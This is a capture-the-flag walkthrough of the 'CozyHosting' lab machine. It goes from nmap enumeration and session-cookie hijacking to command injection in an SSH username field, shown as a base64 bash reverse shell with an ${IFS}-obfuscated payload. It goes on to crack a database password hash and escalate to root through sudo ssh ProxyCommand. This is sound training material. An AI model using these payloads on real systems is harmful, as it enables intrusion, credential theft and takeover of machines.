The “CozyHosting” machine is created by “commandercool”. This is an easy machine with a strong focus on web application security vulnerabilities which enables us to get the reverse shell of the machine. So, let’s start…
Enumeration
Using Nmap
nmap -sC -sV -O 10.10.11.230 -A -T4 -Pn
Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.59s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
6969/tcp open http SimpleHTTPServer 0.6 (Python 3.10.12)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=9/6%OT=22%CT=1%CU=41377%PV=Y%DS=2%DC=T%G=Y%TM=64F8080D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=2%ISR=10C%TI=Z%CI=Z%II=I%TS=9)SEQ(
OS:SP=101%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=Z%I
OS:I=I%TS=8)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=9)SEQ(SP=101%GCD=1%I
OS:SR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT1
OS:1NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE
OS:88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=
OS:)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 995/tcp)
HOP RTT ADDRESS
1 364.46 ms 10.10.14.1
2 555.36 ms cozyhosting.htb (10.10.11.230)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.08 seconds
After nmap report, we found that there are three open ports on this machine. Now, let’s add the ip to /etc/hosts & access cozyhosting.htb.
Enumerating web
Visiting this page, it becomes clear that nothing is captivating apart from the Login feature. So we tried to fuzz the directories enabled on this site.
dirsearch -u http://cozyhosting.htb
During this directory fuzzing, we find a directory that contains the JESSIONIDs of the users.
So we tried to log in by replacing our JESSIONID with this JESSIONIDs & ………………….
Yay!!!!!!! we logged in …......
Now, on this dashboard, we find that there was a functionality running that serves an SSH connection to its users.
After giving a random hostname & username, we captured the request in BurpSuite. Then we tried to send the request (using Burp Repeater) without giving the username & it responded as ssh help section.
After that, we tried to send the username with a single quote (test’) & it shows that there was an error created during the “/bin/bash -c “ execution process.
Now, we made our own payload which will give a reverse shell while executed by the machine.
echo "bash -i >& /dev/tcp/<your-ip>/<your-port> 0>&1" | base64 -w 0
;echo${IFS%??}"<your payload here>"${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;
We send this payload as the username with URL encoded & started a listener on our machine.
Woo-hoo!!!! we successfully get a reverse shell………
nc -nvlp <your_given_port>
Now it’s time to make this shell stable !!
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + z
stty raw -echo; fg
Here on this shell, we got a <something>.tar file.
python3 -m http.server 4444
wget http://10.10.11.230:4444/<file_name>
Thereafter, we opened this file using ‘jd-gui’ & got the PostgreSQL database's username & password.
jd-gui <file_name>
We successfully logged into the PostgreSQL database using these username & password.
psql -h 127.0.0.1 -U postgres
\c cozyhosting
Here we got a hash value of the password.
\d
select * from users;
We cracked this password using john ….!!
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
We also found a user named ‘josh’ in /etc/passwd …!!
cat /etc/passwd
Now using this username & password we successfully get the ssh shell & user flag.
ssh josh@10.10.11.230
ssh josh@cozyhosting.htb
Privilege Escalation
We used sudo -l to list the allowed (and forbidden) commands for the invoking user. Here we found that user ‘josh’ may run the following commands on localhost: (root) /usr/bin/ssh * which will give root privileges.
sudo -l
There was a simple payload at GTFOBINS which successfully allowed us to get the shell as the superuser(root).
Payload: https://gtfobins.github.io/gtfobins/ssh/#sudo
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
#Machine Pwn3d…..🫠👽☠️!!
That's it guys....!! Thank you and don't forget to follow me 🫠🙃.